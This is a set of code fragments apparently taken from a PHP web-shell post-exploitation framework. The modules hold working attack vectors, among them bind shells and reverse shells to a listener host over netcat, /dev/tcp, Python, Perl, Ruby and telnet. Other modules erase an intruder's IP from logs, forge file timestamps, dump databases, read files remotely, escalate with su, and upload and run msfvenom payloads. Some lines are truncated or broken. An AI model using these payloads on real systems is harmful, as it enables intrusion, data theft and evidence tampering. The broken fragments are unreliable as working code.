def init(self): self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'}) self.register_vectors([ PhpCode( """@file_put_contents("${rpath}",file_get_contents("${url}"));""", name="file_put_contents"), ShellCmd("""wget ${url} -O ${rpath}""", name="wget"), ShellCmd("""curl -o ${rpath} ${url}""", name="curl") ]) self.register_arguments([ { 'name': 'url', 'help': 'URL to download remotely' }, { 'name': 'rpath', 'help': 'Remote file path' }, { 'name': '-vector', 'choices': self.vectors.get_names(), 'default': "file_put_contents" }, ])
def init(self): self.register_info({'author': ['appo'], 'license': 'GPLv3'}) self.register_vectors([ PhpCode("""$fc=file("${file}"); $f=fopen("${file}","w"); foreach($fc as $line) { if (!strstr($line,"${ip}")) fputs($f,$line); } fclose($f);""", name="php_clear"), ShellCmd("""sed -i /${ip}/d ${file}""", name="clearlog"), ShellCmd( """sed /${ip}/d ${file} > ${file}.$$ && /bin/mv ${file}.$$ ${file}""", name="old_school") ]) self.register_arguments([ { 'name': 'ip', 'help': 'Your IP' }, { 'name': 'file', 'help': 'File to Clear' }, { 'name': '-vector', 'choices': self.vectors.get_names(), 'default': "clearlog" }, ])
def _get_ifconfig_result(self, ifconfig_path): result = ShellCmd(ifconfig_path, target=Os.NIX).run() if not result: log.debug( messages.module_net_ifconfig.error_no_s_execution_result % ifconfig_path) return {} ifaces = re.findall('^(\S+).*?inet addr:(\S+).*?Mask:(\S+)', result, re.S | re.M) if not ifaces: log.debug( messages.module_net_ifconfig.error_parsing_s_execution_result % ifconfig_path) return {} networks = {} for iface in ifaces: try: networks[iface[0]] = IPNetwork('%s/%s' % (iface[1], iface[2])) except Exception as e: log.debug(messages.module_net_ifconfig. error_interpeting_s_execution_result_s % (ifconfig_path, str(e))) pass return networks
def init(self): self.register_info( { 'author': [ 'Ganapati' ], 'license': 'GPLv3' } ) self.register_arguments([ { 'name' : 'rpath', 'help' : 'Remote file path', 'default' : '/tmp/%s' % (random.randint(1,99999)), 'nargs' : '?' }, { 'name' : 'rpython', 'help' : 'Remote python interpreter path', 'default' : 'python', 'nargs' : '?' }, ]) self.register_vectors( [ ModuleExec( module = 'file_upload', arguments = [os.path.join(self.folder, ''), '${rpath}'], name = 'upload_script' ), ShellCmd( payload = """${rpython} '${rpath}'""", name = 'exec_script' ) ] )
def init(self): self.register_info( { 'author': [ 'Emilio Pinna' ], 'license': 'GPLv3' } ) self.register_vectors( [ ShellCmd( payload = "mysqldump -h ${host} -u${user} -p${passwd} ${db} ${table} --single-transaction", name = 'mysqldump_sh' ), PhpFile( payload_path = os.path.join(self.folder, 'mysqldump.tpl'), name = 'mysqldump_php', ) ] ) self.register_arguments([ { 'name' : 'db', 'help' : 'Db to dump' }, { 'name' : 'user', 'help' : 'SQL username' }, # Using passwd instead of pass to avoid rendering the `pass` keyword { 'name' : 'passwd', 'help' : 'SQL password' }, { 'name' : '-dbms', 'help' : 'Db type. Vector \'mysqldump_sh\' supports only \'mysql\'.', 'choices' : ('mysql', 'pgsql', 'sqlite', 'dblib'), 'default' : 'mysql' }, { 'name' : '-host', 'help' : 'Db host or host:port', 'nargs' : '?', 'default' : '' }, { 'name' : '-lpath', 'help' : 'Dump to local path (default: temporary file)' }, { 'name' : '-vector', 'choices' : self.vectors.get_names(), 'default' : 'mysqldump_php' } ])
def init(self): self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'}) self.register_vectors([ PhpCode("print(@base64_encode(implode('',@file('${rpath}'))));", name='file'), PhpCode( "$f='${rpath}';print(@base64_encode(fread(fopen($f,'rb'),filesize($f))));", name='fread'), PhpCode("print(@base64_encode(file_get_contents('${rpath}')));", name='file_get_contents'), ShellCmd("base64 -w 0 ${rpath} 2>/dev/null", name='base64', target=Os.NIX), ]) self.register_arguments([{ 'name': 'rpath', 'help': 'Remote file path' }, { 'name': 'lpath', 'help': 'Local file path' }, { 'name': '-vector', 'choices': self.vectors.get_names(), 'default': 'file' }])
def init(self): self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'}) self.register_vectors([ PhpCode("(@copy('${srcpath}', '${dstpath}')&&print(1))||print(0);", name='php_copy'), PhpCode( "(@file_put_contents('${dstpath}', file_get_contents('${srcpath}'))&&print(1))||print(0);", name='php_file_contents'), ShellCmd("cp '${srcpath}' '${dstpath}' && echo 1 || echo 0", name='sh_cp', target=Os.NIX), ]) self.register_arguments([{ 'name': 'srcpath', 'help': 'Remote source file path' }, { 'name': 'dstpath', 'help': 'Remote destination file path' }, { 'name': '-vector', 'choices': self.vectors.get_names() }])
def init(self): self.register_info( { 'author': [ 'Emilio Pinna' ], 'license': 'GPLv3' } ) self.register_vectors( [ PhpFile( payload_path = os.path.join(self.folder, 'php_context.tpl'), name = 'file_get_contents', ), PhpFile( payload_path = os.path.join(self.folder, 'php_context.tpl'), name = 'fopen_stream_get_contents', ), PhpFile( payload_path = os.path.join(self.folder, 'php_context.tpl'), name = 'fopen_fread', ), PhpFile( payload_path = os.path.join(self.folder, 'php_curl.tpl'), name = 'php_curl', ), PhpFile( payload_path = os.path.join(self.folder, 'php_httprequest1.tpl'), name = 'php_httprequest1', ), ShellCmd( payload = """curl -s -i ${ "-A '%s'" % user_agent if user_agent else "" } ${ '--connect-timeout %i' % connect_timeout } ${ '-X %s' % request if (not data and request) else '' } ${ " ".join([ "-H '%s'" % h for h in header ]) } ${ "-b '%s'" % cookie if cookie else '' } ${ ' '.join([ "-d '%s'" % d for d in data ]) } '${ url }'""", name = 'sh_curl' ) ] ) self.register_arguments([ { 'name' : 'url' }, { 'name' : '--header', 'dest' : 'header', 'action' : 'append', 'default' : [] }, { 'name' : '-H', 'dest' : 'header', 'action' : 'append', 'default' : [] }, { 'name' : '--cookie', 'dest' : 'cookie' }, { 'name' : '-b', 'dest' : 'cookie' }, { 'name' : '--data', 'dest' : 'data', 'action' : 'append', 'default' : [] }, { 'name' : '-d', 'dest' : 'data', 'action' : 'append', 'default' : [] }, { 'name' : '--user-agent', 'dest' : 'user_agent' }, { 'name' : '-A', 'dest' : 'user_agent' }, { 'name' : '--connect-timeout', 'type' : int, 'default' : 5, 'help' : 'Default: 2' }, { 'name' : '--request', 'dest' : 'request', 'choices' : ( 'GET', 'HEAD', 'POST', 'PUT' ), 'default' : 'GET' }, { 'name' : '-X', 'dest' : 'request', 'choices' : ( 'GET', 'HEAD', 'POST', 'PUT' ), 'default' : 'GET' }, { 'name' : '--output', 'dest' : 'output' }, { 'name' : '-o', 'dest' : 'output' }, { 'name' : '-i', 'dest' : 'include_headers', 'help' : 'Include response headers', 'action' : 'store_true', 'default' : False }, { 'name' : '-local', 'action' : 'store_true', 'default' : False, 'help' : 'Save file locally with -o|--output' }, { 'name' : '-vector', 'choices' : self.vectors.get_names(), 'default' : 'file' } ])
def init(self): self.register_info( { 'author': [ 'Emilio Pinna' ], 'license': 'GPLv3' } ) self.register_vectors( [ ShellCmd( "nc -l -p ${port} -e ${shell}", name = 'netcat', target = Os.NIX, background = True ), ShellCmd( "rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc -l ${port} >/tmp/f; rm -rf /tmp/f", name = 'netcat_bsd', target = Os.NIX, background = True ), ShellCmd( """python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", ${port}));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("${shell}");s.close()';""", name = 'python_pty', target = Os.NIX, background = True ), ShellCmd( """socat tcp-l:${port} exec:${shell}""", name = 'socat', target = Os.NIX, background = True ) ] ) self.register_arguments([ { 'name' : 'port', 'help' : 'Port to spawn', 'type' : int }, { 'name' : '-shell', 'help' : 'Specify shell', 'default' : '/bin/sh' }, { 'name' : '-no-autonnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False }, { 'name' : '-vector', 'choices' : self.vectors.get_names() } ])
def init(self): self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'}) # The grep action is done using multiple request. # First search for writable file, and then execute the grep # code for every found file. This allows to reuse code in # find_perm module and reduce the chances of timeout. self.register_vectors([ ShellCmd( payload= "grep ${ '' if case else '-i' } -e '${regex}' '${rfile}'", name="grep_sh", arguments=[ "-stderr_redirection", " 2>/dev/null", ], # Remove the trailing newline postprocess=lambda r: r[:-1] if r and r.endswith('\n') else r), PhpCode( payload= """$m=Array();preg_match_all("/${'' if regex.startswith('^') else '.*' }${regex.replace('/','\/')}${'' if regex.endswith('$') else '.*' }/m${ '' if case else 'i'}",file_get_contents('${rfile}'),$m);if($m) print(implode(PHP_EOL,$m[0]));""", name="grep_php") ]) self.register_arguments([ { 'name': 'rpath', 'help': 'Path. If is a folder grep all the contained files.' }, { 'name': 'regex', 'help': 'Regular expression to match file name' }, { 'name': '-case', 'help': 'Search case sensitive expression', 'action': 'store_true', 'default': False }, { 'name': '-name-regex', 'help': 'Regular expression to match file name to grep' }, { 'name': '-no-recursion', 'action': 'store_true', 'default': False }, { 'name': '-vector', 'choices': self.vectors.get_names(), 'default': 'grep_php' }, ])
def run(self): uname = ShellCmd("""uname -a""").run().strip() _uname = ShellCmd("""uname -srv""").run().strip() if not uname: return path = os.path.dirname(os.path.realpath(__file__)) output = subprocess.check_output([ 'bash', '-c', "%s/linux-exploit/" % path, "-u", uname ]) lines = [bold(yellow(_uname))] for line in output.split("\n"): if line.startswith("[+]"): line = line.replace("\n", "") lines.append(line) return "\n".join(lines)
def run(self, args): result = ShellCmd( payload= """find ${rpath} -type f ${ '-perm -04000' if not only_sgid else '' } ${ '-o' if not only_suid and not only_sgid else '' } ${ '-perm -02000' if not only_suid else '' }""", arguments=[ "-stderr_redirection", " 2>/dev/null", ]).run(args) if result: return result.split('\n')
def init(self): self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'}) self.register_vectors([ ShellCmd( """expect -c 'spawn su -c "${command}" "${user}"; expect -re "assword"; send "${ passwd }\r\n"; expect eof;'""", name="sh_expect", postprocess=lambda x: re.findall( 'Password: (?:\r\n)?([\s\S]+)', x)[0] if 'Password: '******''), ShellCmd( """python -c 'import pexpect as p,sys;c=p.spawn("su ${user} -c ${command}");c.expect(".*assword:");c.sendline("${ passwd }");i=c.expect([p.EOF,p.TIMEOUT]);sys.stdout.write(c.before[3:] if i!=p.TIMEOUT else "")'""", "pyexpect") ]) self.register_arguments([{ 'name': 'passwd', 'help': 'User\'s password' }, { 'name': 'command', 'help': 'Shell command', 'nargs': '+' }, { 'name': '-user', 'help': 'User to run the command with', 'default': 'root' }, { 'name': '-stderr_redirection', 'default': ' 2>&1' }, { 'name': '-vector-sh', 'choices': ('system', 'passthru', 'shell_exec', 'exec', 'popen', 'proc_open', 'perl_system', 'pcntl') }, { 'name': '-vector', 'choices': self.vectors.get_names() }])
def init(self): self.register_info( { 'author': [ 'Emilio Pinna' ], 'license': 'GPLv3' } ) self.register_vectors( [ PhpFile( payload_path = os.path.join(self.folder, 'bfs_walker.tpl'), name = 'php_find', ), ShellCmd( # -print -quit must be at the end of the command payload = """find ${rpath} ${ '-maxdepth 1' if no_recursion else '' } ${ '-writable' if writable else '' } ${ '-readable' if readable else '' } ${ '-executable' if executable else '' } ${ '-type %s' % (ftype) if (ftype == 'd' or ftype == 'f') else '' } ${ "-%sregex '.*%s.*'" % ( '' if case else 'i', expression) if expression else '' } ${ '-print -quit' if quit else '' }""", name = "sh_find", arguments = [ "-stderr_redirection", " 2>/dev/null", ] ) ] ) self.register_arguments([ { 'name' : 'rpath', 'help' : 'Starting path' }, { 'name' : 'expression', 'help' : 'Regular expression to match file name', 'nargs' : '?' }, { 'name' : '-quit', 'action' : 'store_true', 'default' : False, 'help' : 'Quit at first result' }, { 'name' : '-writable', 'action' : 'store_true' }, { 'name' : '-readable', 'action' : 'store_true' }, { 'name' : '-executable', 'action' : 'store_true' }, { 'name' : '-ftype', 'help' : 'File type', 'choices' : ( 'f', 'd' ) }, { 'name' : '-no-recursion', 'action' : 'store_true', 'default' : False }, { 'name' : '-vector', 'choices' : self.vectors.get_names(), 'default' : 'php_find' }, { 'name' : '-case', 'help' : 'Case sensitive', 'action' : 'store_true', 'default' : False }, ])
def init(self): self.register_info( { 'author': [ 'Emilio Pinna' ], 'license': 'GPLv3' } ) self.register_vectors( [ PhpCode( "touch('${rpath}', ${epoch_ts});", name = 'php_touch' ), ShellCmd( "touch -d @${epoch_ts} '${rpath}'", name = 'sh_touch', target = Os.NIX ), ] ) self.register_arguments([ { 'name' : 'rpath', 'help' : 'Remote file path' }, { 'name' : '-epoch-ts', 'help' : 'Epoch timestamp', 'type' : int }, { 'name' : '-human-ts', 'help' : 'Human readable timestamp e.g. \'2004-02-29 16:21:42\' or \'16:21\'' }, { 'name' : '-file-ts', 'help' : 'Clone timestamp from another file' }, { 'name' : '-oldest-file-ts', 'help' : 'Clone timestamp from the oldest file in the same folder', 'action' : 'store_true', 'default' : False }, { 'name' : '-vector', 'choices' : self.vectors.get_names(), 'default' : 'php_touch' } ])
def run(self): # Check msfvenom existance msvenom_path = spawn.find_executable(self.args['msfvenom_path']) if not msvenom_path: log.error( messages.module_backdoor_metasploit.msfvenom_s_not_found % self.args['msfvenom_path']) return # Set options according to the payload type options = [] if 'reverse' in self.args['payload']: lhost = self.args.get('lhost') if not lhost: log.error(messages.module_backdoor_metasploit. error_payload_s_requires_lhost % self.args['payload']) return else: options += [('LHOST', lhost)] else: options += [('RHOST', host)] options += [('PORT', self.args.get('port'))] log.warn(messages.module_backdoor_metasploit.make_sure_run_msfconsole) 'msfconsole -x "use exploit/multi/handler; set PAYLOAD %s; %s run"' % (self.args['payload'], ' '.join( ["set %s %s;" % (f, v) for f, v in options]))) # Get temporary file name local_file = tempfile.NamedTemporaryFile() local_path = # Build argument list for msfvenom arguments_list = [ msvenom_path, '-p', self.args['payload'], '-o', local_path ] + ['%s=%s' % (v, f) for v, f in options] # Add executable format to the argument list if self.args['payload'].startswith('linux/'): arguments_list += ['-f', 'elf'] elif self.args['payload'].startswith('windows/'): arguments_list += ['-f', 'exe'] log.debug(' '.join(arguments_list)) # Generate meterpreter PHP code agent = '' status = 0 try: subprocess.check_call(arguments_list, stderr=open('/dev/null', 'w')) agent = open(local_path, 'r').read() except subprocess.CalledProcessError as e: status = e.returncode except Exception as e: log.debug(str(e)) status = -1 if status or not agent: log.error( messages.module_backdoor_metasploit.error_generating_payload) return if self.args['payload'].startswith('php/'): # If PHP payload, just run it PhpCode(agent, background=True).run() else: if self.session['shell_sh']['status'] != Status.RUN: log.error(messages.module_backdoor_metasploit. error_payload_s_requires_shell_use_php % self.args['payload']) return # Else: upload, execute, remove folders = ModuleExec( "file_find", ['-writable', '-quit', '-ftype', 'd', self.args['rpath'] ]).run() if not folders or not folders[0]: log.error(messages.module_backdoor_metasploit. error_searching_writable_folder_under_s % (self.args['rpath'])) return local_filename = os.path.basename(local_path) remote_path = os.path.join(folders[0], local_filename) ModuleExec("file_upload", [local_path, remote_path]).run() # Let the uploaded file executable ShellCmd("chmod +x %s" % (remote_path)).run() # Execute the payload in background ShellCmd(remote_path, background=True).run() ModuleExec("file_rm", [self.args['rpath']]).run()
def init(self): self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'}) # The grep action is done using multiple request. # First search for writable file, and then execute the grep # code for every found file. This allows to reuse code in # find_perm module and reduce the chances of timeout. self.register_vectors([ ShellCmd( payload= "grep ${ '' if case else '-i' } ${ '-v' if invert else '' } -e '${regex}' '${rfile}'", name="grep_sh", arguments=[ "-stderr_redirection", " 2>/dev/null", ]), PhpCode(payload="""% if invert: $m=file_get_contents("${rfile}");$a=preg_replace("/${'' if regex.startswith('^') else '.*' }${regex.replace('/','\/')}${'' if regex.endswith('$') else '.*' }".PHP_EOL."?/m${ '' if case else 'i'}","",$m);if($a)print($a); % else: $m=Array();preg_match_all("/${'' if regex.startswith('^') else '.*' }${regex.replace('/','\/')}${'' if regex.endswith('$') else '.*' }/m${ '' if case else 'i'}",file_get_contents('${rfile}'),$m);if($m) print(implode(PHP_EOL,$m[0])); % endif""", name="grep_php") ]) self.register_arguments([ { 'name': 'rpath', 'help': 'Path. If is a folder grep all the contained files.' }, { 'name': 'regex', 'help': 'Regular expression to match file name' }, { 'name': '-case', 'help': 'Search case sensitive expression', 'action': 'store_true', 'default': False }, { 'name': '-name-regex', 'help': 'Regular expression to match file name to grep' }, { 'name': '-no-recursion', 'action': 'store_true', 'default': False }, { 'name': '-output', 'help': 'Redirect output to remote file' }, { 'name': '-v', 'dest': 'invert', 'action': 'store_true', 'default': False, 'help': 'Invert matching to select non-matching lines' }, { 'name': '-local', 'action': 'store_true', 'default': False, 'help': 'Save redirected output locally' }, { 'name': '-vector', 'choices': self.vectors.get_names(), 'default': 'grep_php' }, ])
def init(self): self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'}) self.register_vectors([ ShellCmd( """sleep 1; rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc ${lhost} ${port} >/tmp/f""", name='netcat_bsd', target=Os.NIX, background=True), ShellCmd("sleep 1; nc -e ${shell} ${lhost} ${port}", name='netcat', target=Os.NIX, background=True), ShellCmd( """sleep 1; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${lhost}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["${shell}","-i"]);'""", name='python', target=Os.NIX, background=True), ShellCmd( "sleep 1; /bin/bash -c \'${shell} 0</dev/tcp/${lhost}/${port} 1>&0 2>&0\'", name='devtcp', target=Os.NIX, background=True), ShellCmd( """perl -e 'use Socket;$i="${lhost}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("${shell} -i");};'""", name='perl', target=Os.NIX, background=True), ShellCmd( """ruby -rsocket -e'"${lhost}",${port}).to_i;exec sprintf("${shell} -i <&%d >&%d 2>&%d",f,f,f)'""", name='ruby', target=Os.NIX, background=True), ShellCmd( """sleep 1;rm -rf /tmp/backpipe;mknod /tmp/backpipe p;telnet ${lhost} ${port} 0</tmp/backpipe | ${shell} 1>/tmp/backpipe""", name='telnet', target=Os.NIX, background=True), ShellCmd( """sleep 1; python -c 'import socket,pty,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${lhost}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("${shell}");'""", name='python_pty', target=Os.NIX, background=True) ]) self.register_arguments([{ 'name': 'lhost', 'help': 'Local host' }, { 'name': 'port', 'help': 'Port to spawn', 'type': int }, { 'name': '-shell', 'help': 'Specify shell', 'default': '/bin/sh' }, { 'name': '-no-autonnect', 'help': 'Skip autoconnect', 'action': 'store_true', 'default': False }, { 'name': '-vector', 'choices': self.vectors.get_names() }])